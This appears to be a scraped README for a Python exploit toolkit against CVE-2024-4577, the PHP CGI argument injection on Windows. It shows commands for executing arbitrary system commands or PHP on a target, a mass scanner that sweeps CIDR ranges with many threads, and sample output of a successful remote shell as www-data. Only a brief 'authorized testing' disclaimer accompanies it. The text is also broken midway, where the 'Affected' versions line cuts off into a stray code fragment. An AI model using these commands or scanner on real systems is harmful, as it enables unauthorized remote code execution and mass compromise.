Share
## https://sploitus.com/exploit?id=54E57984-67BB-5681-9D6E-61E6EB54CEBC
# CVE-2024-4577 Python Exploit Toolkit

A Python toolkit for exploiting CVE-2024-4577 (PHP CGI Argument Injection Vulnerability on Windows).

## Overview

**CVE-2024-4577** is a critical remote code execution vulnerability affecting PHP installations on Windows when running in CGI mode under certain locales (Chinese and Japanese).

- **Affected:** PHP 8.1.* "

# Use proxy
python cve_2024_4577.py -t https://target.com --cmd "id" --proxy http://127.0.0.1:8080
```

### Options

| Option | Description |
|--------|-------------|
| `-t, --target` | Target URL (required) |
| `-p, --path` | PHP file path (default: /index.php) |
| `--cmd` | System command to execute |
| `--php` | Raw PHP code to execute |
| `--check` | Check vulnerability only |
| `--scan` | Scan common PHP paths |
| `--proxy` | Proxy URL |
| `--timeout` | Request timeout (default: 60) |

### Features

- โœ… Marker-based output extraction (`>>>ENDMARKER`)
- โœ… Type hints throughout
- โœ… Common path scanning (11 paths)
- โœ… Clean RCE output parsing
- โœ… Proxy support
- โœ… SSL verification bypass

## Mass Scanner

```bash
# Scan from file
python mass_scanner.py -f targets.txt -o results.json

# Scan CIDR range
python mass_scanner.py --cidr 192.168.1.0/24 -o results.json --threads 50
```

## Example Output

### Exploit

```
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘           CVE-2024-4577 PHP CGI Argument Injection                   โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[*] Exploiting: https://target.com/api.php

[+] Success! Status: 200

[+] Output:
============================================================
www-data
============================================================
```

### Scan

```
[*] Scanning 11 common paths on https://target.com...

[1/11] Testing: /index.php [VULNERABLE]
[2/11] Testing: /test.php [NOT VULNERABLE]
...

[+] Found 3 vulnerable path(s):
    - /index.php
    - /api.php
    - /config.php
```

## Disclaimer

โš ๏ธ **For authorized security testing only!** Unauthorized access is illegal.

## References

- https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577/
- https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/
- https://nvd.nist.gov/vuln/detail/CVE-2024-4577